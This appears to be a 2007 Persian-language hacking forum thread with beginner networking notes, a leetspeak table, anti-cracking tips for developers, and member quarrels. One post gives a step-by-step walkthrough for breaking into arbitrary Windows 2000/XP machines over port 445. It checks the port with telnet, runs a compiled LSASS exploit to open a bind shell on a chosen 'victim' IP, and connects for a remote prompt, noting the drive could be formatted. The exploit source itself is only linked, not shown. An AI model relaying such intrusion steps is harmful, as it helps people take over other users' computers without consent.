۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستم‌ها آمار login را نگه می‌دارند که در مورد آنها اين مرحله بسيار مهم است.

mazi_z_PSP
01-06-2007, 09:48
دوستان اون کد هايی که وسطشون شکلک افتاده رو دوباره براتون ميفرستم تا بتونيد ازشون استفاده کنيد

mazi_z_PSP
01-06-2007, 11:01
آموزش هک ----


درس اول
کامپیوترهای Client :
کامپیوترهایی که از شبکه و اطلاعات استفاده می کنند
کامپیوترهای Server :
کامپیوترهایی که وظیفه تامین اطلاعات و سرویس دهی را در شبکه بر عهده دارند
IP :
هر کامپیوتر متصل به اینترنت صرفنظر از اینکه آیا این کامپیوتر سرور است یا کلاینت یک شماره مخصوص منحصر به فرد دارد تا بتوان به وسیله آن شماره به کامپیوتر دسترسی داشت که IP می گویند. این عدد برای کامپیوترهای سرور و کامپیوترهایی که به غیر از روش Dilaup به اینترنت متصل می شوند عددی است ثابت و برای کامپیوترهای کلاینتی که به صورت Dialup به اینترنت متصل می شوند متغیر است که این عدد را هر بار که به ISP متصل می شویم به صورت تصادفی در اختیار ما قرار می دهد.
IP یک عدد 32 بیتی (چهاربایتی) است که به صورت زیر نوشته می شود xxx.xxx.xxx.xxx که منظور از xxx عددی بین 0 تا 255 می باشد .
پورت Port :
Port محلی که داده ها وارد و یا خارج می شوند (درگاههای ورود و خروج) در مبحث مربوط به هک با پورت هایی سروکار داریم که به هر کدام یک عددی نسبت می دهیم که این اعداد بین 1 و 655351 می باشند. هرکدام از پورت های فعال توسط یک نرم افزار مدیریت می شوند مثلا پورت 25 مخصوص ارسال ایمیل می باشد.
در درسهای بعد لیست پورت ها و کاربردشان را شرح خواهیم داد.

mazi_z_PSP
01-06-2007, 11:04
آموزش هک ---- :



درس دوم


:133 Speak
استفاده از معادل های قراردادی به جای حروف انگلیسی که هکر ها گاهی هنگام نوشتن از آن استفاده
می کنند . لیست آنها را در زیر می بینید:

O

0

L ; I

1

Z

2

E

3

A

4

S

5

G

6

T

7

B

8

L ; I

|

at

@

S

$

H

)(

H

}{

N

/ \ /

W

\ / \ /

M

/ \ / \

P ; D

| >

K

| <

F

P H

S

Z

مثلا به جای he speaks می شود:

}{3 $|>34|<z

mazi_z_PSP
01-06-2007, 11:07
دوستان به علت يک سری مشکلات ادامه این آموزش ها بعدا گزاشته ميشه.الان اگر تونستم آموزش های ديگه ای براتون ميزارم

mazi_z_PSP
01-06-2007, 11:11
مطلبي كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنه يا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان ميكنيم كه ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هكر هاي حرفه اي براي اين كارها يك برنامه خاص را استفاده ميكني بنا به سليقه خودتان كه از چه برنامه اي خوشتان مياد ولي در اينجا از دستوراتي استفاده ميكنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با كمترين امكانات ميخوايم به نتيجه برسيم
خوب توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب حالا به گام دوم ميرويم در زير كد هاي حمله به اين پورت را مشاهده ميكنيد اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را بصورت زير استفاده ميكنيد

expl <target> <victim IP> <bindport> [options]
در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني ويندوز 2000 است كه 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است كه پورت 445 ان باز بود
binport شماره پورتي است كه ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هك كنيد
option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم
خوب دوست من كار بسيار ساده است فرض كنيد اي پي قرباني من 217.0.0.1 است و من طبق ان چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام ميدهدم
1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان اماده استفاده است استفاده ميكنم
4- پنجره قبلي را كه در 2 دستور قبل باز كردم ميبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اينكه دستور خط 6 را زدنيد اين نوشته ها را مشاهده ميكنيد----
*
Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
*
Connecting to 217.0.0.1:445 ... OK
*
Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را انتخاب كردم الان باز شده تا ما وارد دستگاه قرباني بشويم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هك كنيد و اين خطوط را مشاهده خواهيد كرد
* Microsoft Windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>
11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد
ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!
و اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1 يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما كافي است كه همان دستور بالا را كه براي حمله استفاده مكنيد بزنيد و فقط به اخرش -t اضافه كنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميكند اگر نسخه ويندوز را winnt 5.0اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است

اميدوارم كه مطلب بالا مورد استفاده شما قرار گرفته باشد توجه كنيد براي اينكه همه بتوانند اين مطلب را استفاده كنند مجبور شدم كه خيلي جاها را ساده كنم ولي در سورس اصلي برنامه ميتوانيد به اصل دستور عمل ها پی ببريد .
برای دريافت کد برنامه به زبان سی اينجا کليک کنيد ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
ادرس : [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

اين وبلاگ براي كامپايل كدهاي سي كه در بالا مشاهده ميكنيد كمكي به شما عزيزان نمي تواند بكند متاسفيم از نزديكترين برنامه نويس سي كه در اطرافتان وجود دارد براي ايجاد فايل اجرايي از اين برنامه استفاده كنيد.
توجه به اين نكته ضروري است كه با اين روش شما هر اي پي را كه بخواهيد ميتوانيد به احتمال 80% هك كنيد استفاده از مطلب بالا فقط درصورتيكه هدف شما يادگيري و افزايش معلومات باشد

mazi_z_PSP
01-06-2007, 11:18
چگونه برنامه هایمان را در برابر کرک ها مقاوم تر سازیم ؟

1 – از اسامی با معنی مانند زیر استفاده نکنید :

function RegistrationOK: Boolean;

هر چقدر هم که کدی را که در این روال نوشته باشید متبحرانه و هوشمند باشد Cracker ها آن را در کمتر از 20 ثانیه در هم خواهند کوبید !!! خواه این را باور کنید یا نه .
راه دیگر اینست که در این روال کدهای برنامه را هم قرار دهید . ( یعنی بخشی از برنامه که ربطی هم به قفل ندارد ) در این حالت اگر Cracker این روال را غیر فعال کند برنامه هم درست کار نخواهد کرد .
2 – از پیغامهای nagscreens یا “Gotcha” استفاده نکنید :
این از اولین چیزهایی است که یک Cracker چک می کند . آنها هیچوقت برای تجزیه و تحلیل 300K برنامه شما وقت نخواهند گذاشت . بلکه به دنبال nag screens یا " مهلت استفاده مجانی تمام شده است " (Your evaluation time has expired!) خواهند گشت و از آنجا شروع به کار می کنند . ( در ادامه درباره این روش بیشتر بحث خواهیم کرد ) .
در بسیاری موارد آنها موفق می شوند که این صفحه را از resource فایل اجرایی بر خواهند داشت و برنامه بدون اینکه صفحات شما رانشان بدهد بدرستی کار خواهد کرد . اگر واقعاً به وجود اینچنین صفحاتی نیاز دارید آنها را در زمان اجرا و به طور دینامِک بسازید . و پیغام های مبنی بر اینکه برنامه رجیستر نشده است را در بخش معرفی (About) قرار دهید . بعضی از برنامه نویسان اعتقاد دارند که نمایش صفحات nag کاربران را از برنامه متنفر می کند و ... ( تو ایران از این خبرها نیست )
3 – از اسامی با معنی برای فایلها استفاده نکنید :
مانند License.dat . چرا ؟ شماره 1 را دوباره بخوانید .
4 – از روشهای نامتقارن رمزگذاری استفاده کنید :
تنها استقاده از اسامی غیر معمول در اسامی فایلها کافی نیست . بلکه ترکیب با این روش می تواند مدتها آنها را سر کار بگذارد !!!
5 – از تاخیر بلند استفاده کنید (Long Delay) :
بلافاصله به کاربر پیغام رجیستر ندهید و تا مدتی ( مثلاً یک یا دو روز ) آن را به تاخیر بیاندازید . ( Cracker ها از این موضوع نقرت دارند )
6 – از تاخیر کوتاه استفاده کنید : (Short Delay ) :
بعد از وارد کردن کلمه رمز یا هر روتین چک کننده یک یا دو ثانیه صبر کنید تا جلوی حمله های brute force گرفته شود . ساده است ولی عالی کار می کند . ( یا اینکه اگر کلمه رمز درست نبود مکث کنید )
7 – از checksum هم در dll و هم در exe استفاده کنید :
این روش چندان هم مطمئن نیست ولی کار Cracker را سخت تر می کند .
8 – برنامه تان را " خود ترمیمی " بنویسید :
این همان چیزی است که در تصحیح خطای مودم ها و هارد دیسکها استفاده می شود . این تکنولوژی قدمت زیادی دارد ولی کسی از آن در برنامه ها استفاده نمی کند ؟ فایده این روش در این است که اگر Cracker با یک decompiler کار کند لیستی را خواهد دید که دیگر معتبر نبوده و اجرا نمی شود .
9 – برای برنامه خودتان patch بنویسید :
کد خود را تغییر بدهید تا هر بار روش چک کردن و روالهایش تغییر کند .
10 – شماره های سریال را در جاهای غیر متعارف نگهداری کنید :
مثلاً در property یک فیلد بانک اطلاعاتی . حتما شنیده اید که : به آنها یک نام dll بدهید و در شاخه سیستم ویندوز نگهداری کنید . آنقدر گفته و شنیده شده که دیگر ارزشی ندارد .
11 – شماره های سریال را در چند جا نگهداری کنید :
( و تنها اگر اولی معتبر بود دومی را چک کنید )
12 – از کلمات معروف استفاده نکنید :
مانند این : متاسفانه .... (Sorry . But ) این هم جزو اولین چیزهایی است که چک می شود . کلمات را دینامیکی بسازید و یا آنها را به رمز درآورید .
13 – Cracker را غرق کنید :
با استفاده از فراخوانی (call) های ساختگی و رشته هایی که خوب رمز شده اند . دام افکنی لذت بخش است !!!
14 – از کلمات کیدی (reserve word) استفاده کنید :
وقتی رشته یا رمزی را کد می کنید سعی کنید مانند کلمات کلیدی در بیاید مانند : “73AF” یا GetWindowText . این باعث می شود که DisAssembler ها به اشتباه بیافتند .
15 – از حالت غیر فعال (disable) استفاده نکنید :
اگر در حالت نمایشی برنامه شما اطلاعات را ذخیره نمی کند گذاشتن یک منوی خاکستری برای آن کافی نیست . بلکه کد هم نباید در فایل exe شما موجود باشد . برای این منظور از روش ساده زیر می توانید استفاده کنید :


{$IFDEF trial}
... کاری انجام ندهید
{$ELSE}
... کارهای لازم برای کاربران اصلی و یا نسخه کامل
{$ENDIF}


16 – چند نسخه از برنامه تان ایجاد کنید :

{$IFDEF Anticrack_Method36}
.. روش تست قفل شماره 36
{$ENDIF}

با استفاده از روش فوق می توانید به سادگی چند نسخه از برنامه تان ایجاد کنید و هر روش را بسادگی فعال / غیر فعال کنید ( با استفاده از DEFINE کردن هر کدام از روشها در ابتدای برنامه قبل از کامپایل ) و این باعث می شود که crack یکی از نسخه های برنامه تان برای دیگری کار نکند و Cracker باید تمام نسخه ها را download و جداگانه crack کند یا اینکه اگر کاربر برنامه را از جایی متفاوت با cracker دریافت کند برنامه شما crack نخواهد شد !!! . و شما می توانید یک نسخه ویژه برای کاربران مجاز داشته باشید که کد رجیستر آن برای نسخه آزمایشی کار نخواهد کرد .
17 – برنامه تان را بسرعت به روز کنید (Update) :
این باعث می شود که کد برنامه تان تغییر کند و یک crack ساده برای نسخه بعدی شما کار نکند . و همینطور برنامه تان را در یک سایت عمومی برای دانلود نگذارید . این باعث می شود که کنترل بیشتری بر روی برنامه تان داشته باشید که از کجا دریافت می شود و همینطور سایر افراد نمی توانند نسخه قبلی برنامه تان را که crack روی آن کار می کند پیدا کنند . بله می توانند برنامه شما را نیز به همراه crack آن ارائه کنند ولی این باعث می شود که هارد دیسک آنها بسرعت پر شود .
18 – کدهای رجیستر موقت بسازید :
وقتی کاربری ادعای پرداخت پول کرد این کد را که تنها 15 تا 30 روز کار خواهد کرد برای او بفرستید . و تنها پس از اینکه مطمئن شدید پول به حسابتان واریز شده است کد اصلی و بدون محدودیت خود او را به او بدهید . بدین صورت Cracker ها هم به اشتباه می افتند . آنها گمان خواهند کرد که این کد اصلی است و آنرا در سایت خود قرار خواهند داد در حالیکه اینطور نیست و آنها بین دوستان خود احمق جلوه خواهند کرد . این موضوع به خصوص برای beta-tester ها مفید است .
19 – از متد قوی برای کد کردن استفاده کنید :
استفاده از یک xor ساده کافی نیست . از متدی استفاده کنید که به راحتی برگشت پذیر نباشد . ( اگر بتوانید متد برگشت ناپذیری را پیدا کنید چه بهتر و در ضمن متد برگشت ناپذیر به روش یا روشهایی گفته می شود که با داشتن حاصل عملیات و تمام متغیرها نتوان به عدد اولیه رسید . به عنوان مثال عبارت ax+b برگشت پذیر است زیرا با داشتن جواب 5 و مقادیر a=2 و b=1 می توان به مقدار x که همان 2 خواهد بود رسید ) و هر دو روش کد گذاری و از کد درآوردن را در برنامه تان نگذارید .
20 – چند نظر درباره قفلهای وابسته به سخت افزار :
بعضی از روشهای قفل گذاری شامل دریافت اطلاعاتی از سخت افزار کاربر مانند شماره سریال هارد دیسک یا checksum بایوس یا ... است . وقتی این عدد یکبار محاسبه شد آن را در جایی ذخیره کنید و سپس برنامه تان را اجرا کنید یا موارد غیر فعال را فعال کنید . یا اینکه می توانید این اطلاعات را کد گذاری کرده و به کاربر بگویید آنها را برای شما بفرستد . سپس کد فعال سازی را ساخته و برای کاربر ارسال کنید .
در ظاهر همه چیز خوب به نظر می رسد هر چند اگر مطالب قبلی را خوانده باشید می دانید که بهترین روش نیست ولی یک مشگل بزرگ در این روش نیاز به ارتباط دو طرفه بین شما و کاربران نهایی است که در مورد پروژه های بزرگ اصلا روش کارآمدی نیست .
هر بار که کاربر هارد دیسک خود را عوض می کند یا تغییری در سخت افزار خود می دهد و یا حتی هنگامیکه کامپیوتر جدیدی می خرد باید کد فعال سازی جدیدی از شما در خواست کند و اگر برنامه را چند ماه قبل خریده باشد ممکن است مدام در email خود نامه هایی با مضمون " چرا برنامه تان کار نمی کند؟ " را دریافت کنید که منجر به عدم اطمینان کاربرانتان خواهد شد . پس پیش از استفاده از این روش در مورد این موارد خوب قکر کنید . ( این روش برای برنامه های ایرانی به نظر من بهترین روش است بخصوص اگر از شماره سریال هارد استفاده شود همانطور که من هم 2 سالی هست که از این روش استفاده می کنم و برای مورد آخر نیز می توانید این موضوع را در بخش about برنامه تان ذکر کنید ) .
21 – و در نهایت وقت زیادی برای قفل گذاری برنامه هایتان نگذارید :
به راستی قفل ها چقدر ارزش دارند ؟ آیا بهتر نیست زمانی را که برای بهبود قفل خود صرف می کنید برای افزایش کارآیی برنامه تان بگذارید ؟ مشگل شکسته شدن قفل برنامه تان چه ارزشی خواهد داشت وقتی کسی از آن استفاده نکند ؟ یا بدرد کسی نخورد ؟ فکر نکنید کار شما بهترین در دنیا است

mazi_z_PSP
01-06-2007, 22:54
مقاله ها خوب بود؟ خوب اگه خوب بود يکم ديگه صبر کنين تا يه عالمه آموزش توپ براتون بزارم. به اميد سر بلنديه ایران

double_n
03-06-2007, 01:44
شما می شه یه توضیح کامل از شل کدینگ و برنامه نویسی برای باگ های ریپورت شده بدین ؟ تا چه حد با برنامه نویسی توی لینوکس اشنایی دارین تا حالا چند تا سرور رو امن کردین تاحالا چند تا سایت رو مورد حمله قرار دادین؟ با یه دسترسیه ساده می تونین یه سرور رو کامل در اختیار بگیرین ؟ می دونین سایت چند جای بزرگ رو چطوری زدن؟میدونی از قسمت ارسال مقالات سایت های آموزشی و دانشگاه ها چه استفاده ها یی میشه؟ میدونی برنامه نویس های وب دانشگاه ها چقدر گاگولن؟ می دونی برای امنیت و هکینگ باید یکم تیز باشی ؟ میدونی اینا دیگه کاربرد نداره ؟ میدونی باید بشینی برنامه های سرور ها رو آنالیز کنی و یه باگی از اونا پیدا کنی؟ بلدی برای یه باگ اوور فلو یا همون سرریز بافر توی لینوکس با زبان پرل ایکسپلوییت لوکال بنویسی ؟به کل از کرنل لینوکس یا هسته ی ویندوز چی می دونی؟ سیستم عامل چطوری میاد بالا؟ چطور می شه وقتی تو ویندوز هایپر نت می کنی بعد سیستمت رو روشن می کنی همه ی پنجره ها تو همون حالت قبل از هایپر نت هستن؟
می دونی الان دزدی اطلاعات خیلی مهمتر از هک های دیگه شده می دونی چرا گیر دادیم به سایت شرکت هایی که کد فعال سازی نرم افزار هاشون رو از طریق سایتشون میدن به کاربر؟
شما کجایی و هکر ها و امنیت کار های امروزی کجان!! شما هنوز موندی هکر کیه یکیم میاد رو یه سرور روزی 2 یا 3 بار سرک می کشه ببینم فلان دوست پرشین تولزیمون برنامه ای نوشته و نمونه ای از برنامش رو سایت گذاشته مثلا فالان برنامه ی پخش موزیک آنلانش رو کامل کرده ؟ یا فلان سایت سورس برنامه ی مدیریت دانشگاه تهران رو گذاشته رو سایتش و 4 مگ سورسه باحال توی وی بی !!!!
نمی خوام بگم شما چیزی از امیت سرت نمی شه ولی باید بگم این چیزایی که شما می گی رو همه الان می دونن نیازی به دوباره گویی نیست (تجربه را تجربه کردن خطاست : : منی که می دونم کرنل 2.6.9 (اونزمان که گیره این چیزا بودم اینجوری که می گم بود) با اون ایکپلوییت که دسترسی رو به حد آخر (به قول ایمان به اون حد آخر مستی و نعشگی) یعنی روت میرسونه بخوام روت کنم سرور کرش می کنه و این مساله رو دیدم نباید این کار رو رو یه سرور دیگه انجام بدم).
حالا اینم بگم بدون دوست من بنده یه 8 ماهی می شه بدون سر و صدا هم تیمم که دیفیس هاش نشون می داد که تیم هشتم تو ایرانه رو جمع کردم و از بحث امنیت و هکینگ کناره گیری کردم و رو آوردم به مبحث امنیت نرم افزار و کرکینگ حالا همه ی اینا به کنار این نکته رو بدون هرچی می دونی بزار بمونه واسه خودت آموزش اینجور چیزا حرامه همین وبس.
از دست منم ناراحت شدی تو رو قسمت میدم به جان عزیزت اینجا پستی نده بیا تو پیام خصوصی هر حرفی دلت خواست بهم بزن . اینا رو گفتم بدونی باید بری پی این چیزا نه اینکه هکر کیه هکر چطوریه ؟ بعضی وقت ها کلاه سفیدا کاری می کنن که ..... هکر هکره هیچ فرقی نداره.
یا علی

ممنون دوست عزیز، سوالاتتون نکات بسیار عالی در خودش جای داده و به بعضی از سوالاتی که داشتم و همینطور سوالات خیلی ها که فکر می کنند هکر هستند و غرور بهشون اجازه پرسیدن نمیده با سوالات مناسبی جواب داده شده، امیدوارم همیشه موفق باشی.:10: :11:


اين يعني چي؟من كه پاك گيج شدم
راستي اگه كسي گفت چرا ما ايراني ها فقط بلديم تكست بزنيم بدون تصوير و توضيح بيشتر يك جايزه داره

جایزه اش چیه؟ من میدونم!!!!! ولی بیخیال بشی به نظرم بهتره :46:

موفق و سربلند باشید.

__Genius__
03-06-2007, 02:16
ممنون دوست عزیز، سوالاتتون نکات بسیار عالی در خودش جای داده و به بعضی از سوالاتی که داشتم و همینطور سوالات خیلی ها که فکر می کنند هکر هستند و غرور بهشون اجازه پرسیدن نمیده با سوالات مناسبی جواب داده شده، امیدوارم همیشه موفق باشی.:10: :11:



جایزه اش چیه؟ من میدونم!!!!! ولی بیخیال بشی به نظرم بهتره :46:

موفق و سربلند باشید.

اتفاقا شما اشتباه گرفتین ...
چهار تا آدم به قول اون دوستمون که میگه مثل ایمان ( im4n ) مدیر امپرور که پیدا میشه هک توی کشورمون میشه بچه بازی ...
یاد گرفتن فقط دیفیس کنن ...
چی بگم والا ... حرف که زیاد هست ولی بیخیال ...
تا وقتی که به هک و امنیت دید درستی نداشته باشیم هیچی نمیشیم .
شمایی که ادعا میکنی شل کدینگ بلدی .... لطف کن باگ مربوط به ویندوز ani رو برام تحلیل کن ...

double_n
03-06-2007, 14:06
شمایی که ادعا میکنی شل کدینگ بلدی .... لطف کن باگ مربوط به ویندوز ani رو برام تحلیل کن ...

من بگم؟ یا اون دوست دیگه؟:19:

mazi_z_PSP
06-06-2007, 18:42
من بگم؟ یا اون دوست دیگه؟:19:
شما بهتره خودت و با اون دوست ديگت هيچی نگی. بشين و تماشا کن. اجازه نميدم این تاپيک رو به حرف های باطل و کل کل بکشونی. نميخوای بورو با همون دوستات هک کن . تا شايد کمی بزرگ شی. معروف شی. و .... شی . فکر ميکونی خيلی بزرگی؟ خوب اگر اینطوره اینجا جای بزرگ ها نيست.
:2: :21:

double_n
07-06-2007, 01:14
ببین دادا
من اصلا نمیگم که هکرم! نه نیستم و معلومه هم نیستم.
ولی عادت ندارم مطالبی که خوندم دوباره بخونم.
پس خوش باش با مطالب قدیمی دیگران.
موقعی که من عضو اینجا بودم.........
این مطالب تا حالا 3-4 بار توی انجمنها قرار داده شده

جناب جنیوس هم من رو میشناسه و میدونه که هکر نیستم.


تا شايد کمی بزرگ شی. معروف شی. و .... شی . فکر ميکونی خيلی بزرگی؟ خوب اگر اینطوره اینجا جای بزرگ ها نيست.
من نه هکرم و نه بزرگ، ولی اگه میخوای بزرگ بشی و همینطور کوچول نمونی، باید دست بزرگترت رو بگیری باهاش بری ددری تا یاد بگیری راه رفتن رو. از این ساده تر هم نمیشد بگم


نميخوای بورو با همون دوستات هک کن
مشکل ما ایرانی ها اینه که روز دومی که کامپیوتر می خریم، میریم سراغ خرابکاری یاد گرفتن، در صورتی که اصولش رو یاد نگرفتیم، جالب اینجاست مطالبی هم که یادگرفتیم اونم دست و پا شکسته روز سوم و چهارم میایم به دیگران یاد بدیم.
اینطوریه ملت فکر می کنن هکرها جادوگرند یا جنایتکارند و یا باید خوی جنایتکارانه داشته باشند.
اینطور نیست و کاملا در اشتباهی


شما بهتره خودت و با اون دوست ديگت هيچی نگی. بشين و تماشا کن.
خیلی وقته دارم تماشا می کنم اینطور مطالب رو و میدونم که این تاپیک به هیچ جا نمیرسه... مگر اینکه فکری به حالش بکنید...


اجازه نميدم این تاپيک رو به حرف های باطل و کل کل بکشونی.
اگه یه شخص دیگه بیاد و پستهای من رو بخونه کاملا معلومه که قصد کل کل نداشتم و فقط منظورم این بوده که کیفیت پستهات رو ببری بالا بهتره تا کمیتشون رو .


تا شايد کمی بزرگ شی. معروف شی. و .... شی
به منش انسان معلومه که چه رفتارهایی داره و هدفش ار رفتارهاش چیه، پس لازم نیست به امثال تو بگم.

خوش باش، در پهنه وسیع روزگاری که علمی نامتناهی دارد.
و من و تو قطره ای بیش نیستیم!!!

موفق و سربلند باشید.

Payman_62
07-06-2007, 02:17
سلام.
دوستان عزیز لطفا بحث نکنید.
double_n قبول دارم مطالب قدیمیه. قبلا هم به mazi_z_MCSD گفته بودم سعی کنه مطالب به روز بذاره. mazi_z_MCSD بچه ها حق دارن. هر چی پیدا میکنی کپی پیست میکنی. خیلی بی نظم و ترتیب. از هک میپری به کرک. از کرک میپری به امنیت ویندوز و ... . فونت ها و سایزهایی هم که استفاده میکنی اصلا مناسب نیستن.
بازم میگم سعی کن مطالب به روز و جدید قرار بدی. مطالب رو هم دسته بندی کن و با نظم پیش برو. فونت و سایز رو هم تنظیم کن.

__Genius__ با نظرت در مورد ایمان موافقم. خودش یه بار گفت دنبال شهرته. اینه که نشسته و 24 ساعت سایت دیفیس میکنه.

mazi_z_PSP
07-06-2007, 09:49
رو چشم عزيزان. البته این رو هم بگم من که ADSL ندارم که بتونم به طور کامل از وقتم از اینترنت استفاده کنم. برای همين کمی مطالب در هم و برهمه. معذرت.از این مطالب جديد تر ندارم. اما يک پی دی اف دارم که البته قبلن تو اینجمن ها لينک برای دانلودش گزاشته شده.اما ميخوام برای کسايی که نتونستن و يا نديدن که دانلود کنن مطالبش رو فصل به فصل بزارم.

mazi_z_PSP
07-06-2007, 09:51
خوش باش، در پهنه وسیع روزگاری که علمی نامتناهی دارد.
و من و تو قطره ای بیش نیستیم!!!

موفق و سربلند باشید.
از این حرفت خيلی خوشم آمد. در کل ممنون.

__Genius__
13-06-2007, 03:25
اوه اوه .... اینجا رو ببین چه خبر شده ....:31:
نه دوست من ... من با شما نبودم .. من با اون آقایی هستم که اینجا سنگ ایمان خان رو به سینه میزنن و ادعای امنیت میکنن ....
من اصولا آدمی نیستم که ادعا داشته باشم و یه زمانی ادعا داشتم ولی ترک کردم ...
ولی بهتره آدم از خودش مایه بذاره تا دیگران ;)
کاشکی از یه فرد با سواد مایه میذاشتن ...
متاسفانه تیمهایی همچون .. آشیانه .... امپرور .... دلتا و اینها مبحث امنیت رو توی ایران به خرابی کشوندن ...
از طرف دیگه نگاه کنین هر چند من دیگه توی این تیمها عضو نیستم ولی نگاه کنین ... تیمهایی مثل شبگرد ... سیمرغ هر اسمی داشته باشن خدا رو شکر دیفیسر نیستن .
:)
ولی حتی تیمهایی مثل ihs .... که عزیزان خوبی توش عضو هستن با انجام برخی از دیفیسهاشون جامعه امنیت رو به طرف خرابی میکشونن ....
حرفی ندارم و فقط میتونم بگم 90% عزیزان دیفیسر که با اسم هکر میان جلو و کلمه مقدس هکر رو خراب میکنن توی خیلی از مسائل ساده هنوز گیر هستن :46::13:
اینو حاضرم به صورت real time به دوستان ثابت کنم .
امیدوارم اینطور حرف زدن من رو دلیل بر حسادت یا بی احترامی نذارین .
به امید ایرانی امن ...
:10:

v65j
13-06-2007, 04:02
کیه داره شل کد می نویسه ؟!!!!!
بیا یه برنامه بدم بافر اوور فلو داره (خودم هم باگش رو گفتم) آنالیز کن بگو کجاش باگ داره نیازی به شل کد نویسی نیست ببینیم چند چیا بلدی شاید بنده و بعضی از دوستان بخوان شاگرد خصوصیتون بشن !
راستی دوست دبیانی داری به بعضی ها توهین می کنی دوستانی مثل ایمان و دارک و پایتون و سینا و کاوه و مجید و شاهین و و و و و
تو خودت مطمئن باش اینا اینقدارام که تو فکر می کنی بی سواد نیستن
چقدر با ایمان حرف زدی ( قسمت بیستر علم این دوستان رو می شه از طریق گوگل به دست آورد ولی تا وقتی فکر به دست آوردن نباشی .... (شاید شما چیزی می دونی اینجور هرف میزنی ولی منی که هیچی نمی دونم نظرم اینه) ) چیا ازش پرسیدی در مورد چی پرسیدی بلد نبود ؟؟؟؟
بیخیال این بحث ها این دوست شل کد نویسمون بلده یه Gentoo نصب کنه ؟ !! اصلاً بلدی بدون GUI فدورا رو با اترنت به یه Man وصل کنی که بیاد نت ؟ نه این رو هم نخواستم بلدی بدون GUI لینوکس و Lan کنی (به لن وصل کنی؟!) بلدی بین لینوکس و ویندوز فایل شیر کنی (مبتدی دیگه )
خیلی پیشرفته هم باشی یه توضیح از لایه های کرنل لینوکس بده یا امنیتش رو با یه ورژن پایین ترش مقایسه کن!
بابا بیخیال هک چیه امنیت کیلویی چنده ؟؟؟!!!
طرف توی هاستینگ کنترلر باگ پیدا کرده برای اس کیو ال اینجکشن هزار تا مقاله داده هزار تا تو ضیح داده دیروز سربازیش تموم شده میگم می خوای چیکار کنی ؟! میگی هیچی هرکاری هم بکنم طرف Network و Security و Hacking و Bug و Shell و ... نمیام آخر عاقبت نداره از اینا باید عبرت گرفت!!

__Genius__
13-06-2007, 04:30
دوست عزیز چقدر با اطمینان حرف میزنی ؟!:20:
در همین حد بدونی که من یه باگ از نوع (DoS (Denial Of Service توی Internet Explorer نسخه 6.x.x پیدا کردم فکر میکنم کافی باشه .
من به هیچ عزیزی اینجا بی احترامی نکردم و هر حرفی هم میزنم عین حقیقت هست .
تمام دوستانی که نام بردی رو میشناسم و اینم بدونی که توی سایت bugtraq.ir فعالیت میکنم بد نیست . اونجا با مجید ادمین Ihs همون nt دوست هستم .
